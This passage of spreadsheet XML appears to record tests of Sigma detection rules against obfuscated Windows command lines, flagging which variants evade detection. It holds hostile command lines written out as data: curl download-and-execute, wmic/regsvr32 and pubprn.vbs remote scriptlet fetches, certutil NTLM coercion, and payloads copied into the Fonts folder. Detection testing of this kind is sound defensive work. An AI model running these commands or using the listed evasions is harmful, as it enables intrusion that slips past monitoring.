      <c r="J1748" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1748" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1749" ht="15.75" customHeight="1" s="42">
      <c r="A1749" s="36" t="n"/>
      <c r="B1749" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_office_outlook_enable_unsafe_client_mail_rules</t>
        </is>
      </c>
      <c r="C1749" s="36" t="inlineStr">
        <is>
          <t>Outlook EnableUnsafeClientMailRules Setting Enabled</t>
        </is>
      </c>
      <c r="D1749" s="36" t="inlineStr">
        <is>
          <t>55f0a3a1-846e-40eb-8273-677371b8d912</t>
        </is>
      </c>
      <c r="E1749" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\16.0\Outlook\Security' -Name 'EnableUnsafeClientMailRules' -Value 1 -PropertyType DWORD"</t>
        </is>
      </c>
      <c r="F1749" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1749" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1749" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1749" s="36" t="n"/>
      <c r="J1749" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1749" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1750" ht="15.75" customHeight="1" s="42">
      <c r="A1750" s="43" t="n"/>
      <c r="B1750" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_office_outlook_enable_unsafe_client_mail_rules</t>
        </is>
      </c>
      <c r="C1750" s="43" t="inlineStr">
        <is>
          <t>Outlook EnableUnsafeClientMailRules Setting Enabled</t>
        </is>
      </c>
      <c r="D1750" s="43" t="inlineStr">
        <is>
          <t>55f0a3a1-846e-40eb-8273-677371b8d912</t>
        </is>
      </c>
      <c r="E1750" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -C "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\16.0\Outlook\Security' -Name 'EnableUnsafeClientMailRules' -Value 1 -PropertyType DWORD"</t>
        </is>
      </c>
      <c r="F1750" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1750" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1750" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1750" s="43" t="n"/>
      <c r="J1750" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1750" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1751" ht="15.75" customHeight="1" s="42">
      <c r="A1751" s="43" t="n"/>
      <c r="B1751" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_vscode_child_processes_anomalies</t>
        </is>
      </c>
      <c r="C1751" s="36" t="inlineStr">
        <is>
          <t>Potentially Suspicious Child Process Of VsCode</t>
        </is>
      </c>
      <c r="D1751" s="36" t="inlineStr">
        <is>
          <t>5a3164f2-b373-4152-93cf-090b13c12d27</t>
        </is>
      </c>
      <c r="E1751" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c r^undll32.exe C:\ProgramData\payload.dll,DllMain</t>
        </is>
      </c>
      <c r="F1751" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1751" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1751" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1751" s="43" t="n"/>
      <c r="J1751" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K1751" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1752" ht="15.75" customHeight="1" s="42">
      <c r="A1752" s="43" t="inlineStr">
        <is>
          <t>t1204.002</t>
        </is>
      </c>
      <c r="B1752" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C1752" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D1752" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E1752" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /"c" copy C:\Windows\System32\regsvr32.exe %TEMP%\updater.exe &amp;&amp; wmic process call create "%TEMP%\updater.exe /s /i:http://10.0.0.5/payload.sct scrobj.dll"</t>
        </is>
      </c>
      <c r="F1752" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1752" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1752" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1752" s="4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1752" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1752" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1753" ht="15.75" customHeight="1" s="42">
      <c r="A1753" s="43" t="inlineStr">
        <is>
          <t>t1211</t>
        </is>
      </c>
      <c r="B1753" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C1753" s="36" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D1753" s="36" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E1753" s="36" t="inlineStr">
        <is>
          <t>copy C:\temp\payload.dll %windir%\Fonts\</t>
        </is>
      </c>
      <c r="F1753" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1753" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1753" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1753" s="36" t="n"/>
      <c r="J1753" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1753" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1754" ht="15.75" customHeight="1" s="42">
      <c r="A1754" s="43" t="inlineStr">
        <is>
          <t>t1211</t>
        </is>
      </c>
      <c r="B1754" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C1754" s="36" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D1754" s="36" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E1754" s="36" t="inlineStr">
        <is>
          <t>move C:\temp\payload.exe C:\Windows\Fonts\</t>
        </is>
      </c>
      <c r="F1754" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1754" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1754" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1754" s="36" t="n"/>
      <c r="J1754" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1754" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1755" ht="15.75" customHeight="1" s="42">
      <c r="A1755" s="43" t="inlineStr">
        <is>
          <t>t1211</t>
        </is>
      </c>
      <c r="B1755" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C1755" s="36" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D1755" s="36" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E1755" s="36" t="inlineStr">
        <is>
          <t>move C:\temp\payload.exe C:\Windows\Fonts\payload.exe</t>
        </is>
      </c>
      <c r="F1755" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1755" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1755" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1755" s="43" t="n"/>
      <c r="J1755" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1755" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1756" ht="15.75" customHeight="1" s="42">
      <c r="A1756" s="43" t="inlineStr">
        <is>
          <t>t1211</t>
        </is>
      </c>
      <c r="B1756" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C1756" s="36" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D1756" s="36" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E1756" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" c^opy C:\temp\payload.bat C:\Windows\F^onts\</t>
        </is>
      </c>
      <c r="F1756" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1756" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1756" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1756" s="43" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder (ae9b0bd7-8888-4606-b444-0ed7410cb728)</t>
        </is>
      </c>
      <c r="J1756" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1756" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1757" ht="15.75" customHeight="1" s="42">
      <c r="A1757" s="43" t="inlineStr">
        <is>
          <t>t1211</t>
        </is>
      </c>
      <c r="B1757" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C1757" s="36" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D1757" s="36" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E1757" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" c^opy C:\temp\payload.bat C:\Windows\F^onts\</t>
        </is>
      </c>
      <c r="F1757" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1757" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1757" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1757" s="43" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder (ae9b0bd7-8888-4606-b444-0ed7410cb728)</t>
        </is>
      </c>
      <c r="J1757" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1757" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1758" ht="15.75" customHeight="1" s="42">
      <c r="A1758" s="43" t="inlineStr">
        <is>
          <t>t1211</t>
        </is>
      </c>
      <c r="B1758" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C1758" s="36" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D1758" s="36" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E1758" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C c^opy C:\temp\payload.bat C:\Windows\F^onts\</t>
        </is>
      </c>
      <c r="F1758" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1758" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1758" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1758" s="43" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder (ae9b0bd7-8888-4606-b444-0ed7410cb728)</t>
        </is>
      </c>
      <c r="J1758" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1758" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1759" ht="15.75" customHeight="1" s="42">
      <c r="A1759" s="43" t="inlineStr">
        <is>
          <t>t1211</t>
        </is>
      </c>
      <c r="B1759" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C1759" s="36" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D1759" s="36" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E1759" s="36" t="inlineStr">
        <is>
          <t>copy C:\temp\payload.vbs C:\Windows\System32\..\Fonts\</t>
        </is>
      </c>
      <c r="F1759" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1759" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1759" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1759" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1759" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1759" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1760" ht="15.75" customHeight="1" s="42">
      <c r="A1760" s="43" t="inlineStr">
        <is>
          <t>t1211</t>
        </is>
      </c>
      <c r="B1760" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C1760" s="36" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D1760" s="36" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E1760" s="36" t="inlineStr">
        <is>
          <t>copy C:\temp\payload.exe %SystemRoot%\Fonts\payload.exe</t>
        </is>
      </c>
      <c r="F1760" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1760" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1760" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1760" s="43" t="n"/>
      <c r="J1760" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1760" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1761" ht="15.75" customHeight="1" s="42">
      <c r="A1761" s="43" t="n"/>
      <c r="B1761" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pester_1</t>
        </is>
      </c>
      <c r="C1761" s="36" t="inlineStr">
        <is>
          <t>Execute Code with Pester.bat</t>
        </is>
      </c>
      <c r="D1761" s="36" t="inlineStr">
        <is>
          <t>59e938ff-0d6d-4dc3-b13f-36cc28734d4e</t>
        </is>
      </c>
      <c r="E1761" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "p^ester.bat \" calc.exe; help\""</t>
        </is>
      </c>
      <c r="F1761" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1761" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1761" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1761" s="43" t="n"/>
      <c r="J1761" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1761" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1762" ht="15.75" customHeight="1" s="42">
      <c r="A1762" s="43" t="n"/>
      <c r="B1762" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pester_1</t>
        </is>
      </c>
      <c r="C1762" s="36" t="inlineStr">
        <is>
          <t>Execute Code with Pester.bat</t>
        </is>
      </c>
      <c r="D1762" s="36" t="inlineStr">
        <is>
          <t>59e938ff-0d6d-4dc3-b13f-36cc28734d4e</t>
        </is>
      </c>
      <c r="E1762" s="43" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "p^ester.bat \" calc.exe; help\""</t>
        </is>
      </c>
      <c r="F1762" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1762" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1762" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1762" s="43" t="n"/>
      <c r="J1762" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1762" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1763" ht="15.75" customHeight="1" s="42">
      <c r="A1763" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B1763" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh</t>
        </is>
      </c>
      <c r="C1763" s="36" t="inlineStr">
        <is>
          <t>SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code</t>
        </is>
      </c>
      <c r="D1763" s="36" t="inlineStr">
        <is>
          <t>36475a7d-0f6d-4dce-9b01-6aeb473bbaf1</t>
        </is>
      </c>
      <c r="E1763" s="43" t="inlineStr">
        <is>
          <t>cscript.exe //B C:\Windows\System32\Printing_Admin_Scripts\en-US\..\..\SyncAppvPublishingServer.vbs "
;Start-Process calc"</t>
        </is>
      </c>
      <c r="F1763" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1763" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1763" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1763" s="43" t="inlineStr">
        <is>
          <t>SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code (36475a7d-0f6d-4dce-9b01-6aeb473bbaf1); Potential Command Line Path Traversal Evasion Attempt (1327381e-6ab0-4f38-b583-4c1b8346a56b); Potential Command Line Path Traversal Evasion Attempt (1327381e-6ab0-4f38-b583-4c1b8346a56b)</t>
        </is>
      </c>
      <c r="J1763" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K1763" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1764" ht="15.75" customHeight="1" s="42">
      <c r="A1764" s="43" t="inlineStr">
        <is>
          <t>t1216.001</t>
        </is>
      </c>
      <c r="B1764" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pubprn</t>
        </is>
      </c>
      <c r="C1764" s="36" t="inlineStr">
        <is>
          <t>Pubprn.vbs Proxy Execution</t>
        </is>
      </c>
      <c r="D1764" s="36" t="inlineStr">
        <is>
          <t>1fb76ab8-fa60-4b01-bddd-71e89bf555da</t>
        </is>
      </c>
      <c r="E1764" s="36" t="inlineStr">
        <is>
          <t>cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "sc""ript:[https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216.001/src/T1216.001.sct](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216.001/src/T1216.001.sct)"</t>
        </is>
      </c>
      <c r="F1764" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1764" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1764" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1764" s="36" t="n"/>
      <c r="J1764" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1764" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1765" ht="15.75" customHeight="1" s="42">
      <c r="A1765" s="43" t="inlineStr">
        <is>
          <t>t1216.001</t>
        </is>
      </c>
      <c r="B1765" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pubprn</t>
        </is>
      </c>
      <c r="C1765" s="36" t="inlineStr">
        <is>
          <t>Pubprn.vbs Proxy Execution</t>
        </is>
      </c>
      <c r="D1765" s="36" t="inlineStr">
        <is>
          <t>1fb76ab8-fa60-4b01-bddd-71e89bf555da</t>
        </is>
      </c>
      <c r="E1765" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "sc^ript:[https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216.001/src/T1216.001.sct](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216.001/src/T1216.001.sct)""</t>
        </is>
      </c>
      <c r="F1765" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1765" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1765" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1765" s="36" t="inlineStr">
        <is>
          <t>Pubprn.vbs Proxy Execution (1fb76ab8-fa60-4b01-bddd-71e89bf555da)</t>
        </is>
      </c>
      <c r="J1765" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1765" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1766" ht="15.75" customHeight="1" s="42">
      <c r="A1766" s="43" t="inlineStr">
        <is>
          <t>t1216.001</t>
        </is>
      </c>
      <c r="B1766" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pubprn</t>
        </is>
      </c>
      <c r="C1766" s="36" t="inlineStr">
        <is>
          <t>Pubprn.vbs Proxy Execution</t>
        </is>
      </c>
      <c r="D1766" s="36" t="inlineStr">
        <is>
          <t>1fb76ab8-fa60-4b01-bddd-71e89bf555da</t>
        </is>
      </c>
      <c r="E1766" s="36" t="inlineStr">
        <is>
          <t>cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\..\en-US\pubprn.vbs localhost "script:[https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216.001/src/T1216.001.sct](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216.001/src/T1216.001.sct)"</t>
        </is>
      </c>
      <c r="F1766" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1766" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1766" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1766" s="36" t="inlineStr">
        <is>
          <t>Pubprn.vbs Proxy Execution (1fb76ab8-fa60-4b01-bddd-71e89bf555da); Pubprn.vbs Proxy Execution (1fb76ab8-fa60-4b01-bddd-71e89bf555da)</t>
        </is>
      </c>
      <c r="J1766" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1766" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1767" ht="15.75" customHeight="1" s="42">
      <c r="A1767" s="43" t="n"/>
      <c r="B1767" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_atbroker_uncommon_ats_execution</t>
        </is>
      </c>
      <c r="C1767" s="36" t="inlineStr">
        <is>
          <t>Uncommon  Assistive Technology Applications Execution Via AtBroker.EXE</t>
        </is>
      </c>
      <c r="D1767" s="36" t="inlineStr">
        <is>
          <t>f24bcaea-0cd1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1767" s="36" t="inlineStr">
        <is>
          <t>AtBroker.exe /start C:\public\Oracle_JavaAccessBridge\payload.exe</t>
        </is>
      </c>
      <c r="F1767" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1767" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1767" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1767" s="36" t="n"/>
      <c r="J1767" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1767" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1768" ht="15.75" customHeight="1" s="42">
      <c r="A1768" s="43" t="n"/>
      <c r="B1768" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_atbroker_uncommon_ats_execution</t>
        </is>
      </c>
      <c r="C1768" s="36" t="inlineStr">
        <is>
          <t>Uncommon  Assistive Technology Applications Execution Via AtBroker.EXE</t>
        </is>
      </c>
      <c r="D1768" s="36" t="inlineStr">
        <is>
          <t>f24bcaea-0cd1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1768" s="36" t="inlineStr">
        <is>
          <t>AtBroker.exe /start C:\temp\osk.exe</t>
        </is>
      </c>
      <c r="F1768" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1768" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1768" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1768" s="36" t="n"/>
      <c r="J1768" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1768" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1769" ht="15.75" customHeight="1" s="42">
      <c r="A1769" s="43" t="n"/>
      <c r="B1769" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_ntlm_coercion</t>
        </is>
      </c>
      <c r="C1769" s="36" t="inlineStr">
        <is>
          <t>Potential NTLM Coercion Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D1769" s="36" t="inlineStr">
        <is>
          <t>6c6d9280-e6d0-4b9d-80ac-254701b64916</t>
        </is>
      </c>
      <c r="E1769" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -syncwithWU"\\10.10.10.10\share"</t>
        </is>
      </c>
      <c r="F1769" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1769" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1769" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1769" s="43" t="n"/>
      <c r="J1769" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1769" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1770" ht="15.75" customHeight="1" s="42">
      <c r="A1770" s="43" t="n"/>
      <c r="B1770" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_ntlm_coercion</t>
        </is>
      </c>
      <c r="C1770" s="36" t="inlineStr">
        <is>
          <t>Potential NTLM Coercion Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D1770" s="36" t="inlineStr">
        <is>
          <t>6c6d9280-e6d0-4b9d-80ac-254701b64916</t>
        </is>
      </c>
      <c r="E1770" s="43" t="inlineStr">
        <is>
          <t>certutil.exe /syncwithWU \\192.168.1.100\share</t>
        </is>
      </c>
      <c r="F1770" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1770" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1770" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1770" s="43" t="n"/>
      <c r="J1770" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K1770" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1771" ht="15.75" customHeight="1" s="42">
      <c r="A1771" s="43" t="n"/>
      <c r="B1771" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C1771" s="36" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D1771" s="36" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E1771" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c curl.exe http://example.com/payload.exe -o payload.exe &amp; payload.exe</t>
        </is>
      </c>
      <c r="F1771" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1771" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1771" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1771" s="43" t="n"/>
      <c r="J1771" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K1771" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1772" ht="15.75" customHeight="1" s="42">
      <c r="A1772" s="43" t="n"/>
      <c r="B1772" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C1772" s="36" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D1772" s="36" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E1772" s="43" t="inlineStr">
        <is>
          <t>cmd.exe -"c" curl http://example.com/payload.exe --OuTPut payload.exe &amp; payload.exe</t>
        </is>
      </c>
      <c r="F1772" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1772" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1772" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1772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772" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1772" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1773" ht="15.75" customHeight="1" s="42">
      <c r="A1773" s="43" t="n"/>
      <c r="B1773" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C1773" s="36" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D1773" s="36" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E1773" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" curl http://example.com/payload.exe --output payload.exe &amp; payload.exe</t>
        </is>
      </c>
      <c r="F1773" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1773" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1773" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1773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773" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1773" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1774" ht="15.75" customHeight="1" s="42">
      <c r="A1774" s="43" t="n"/>
      <c r="B1774" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C1774" s="36" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D1774" s="36" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E1774" s="43" t="inlineStr">
        <is>
          <t>cmd.exe -"c" curl http://example.com/payload.exe -"-output" payload.exe &amp; payload.exe</t>
        </is>
      </c>
      <c r="F1774" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1774" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1774" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1774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774" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1774" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1775" ht="15.75" customHeight="1" s="42">
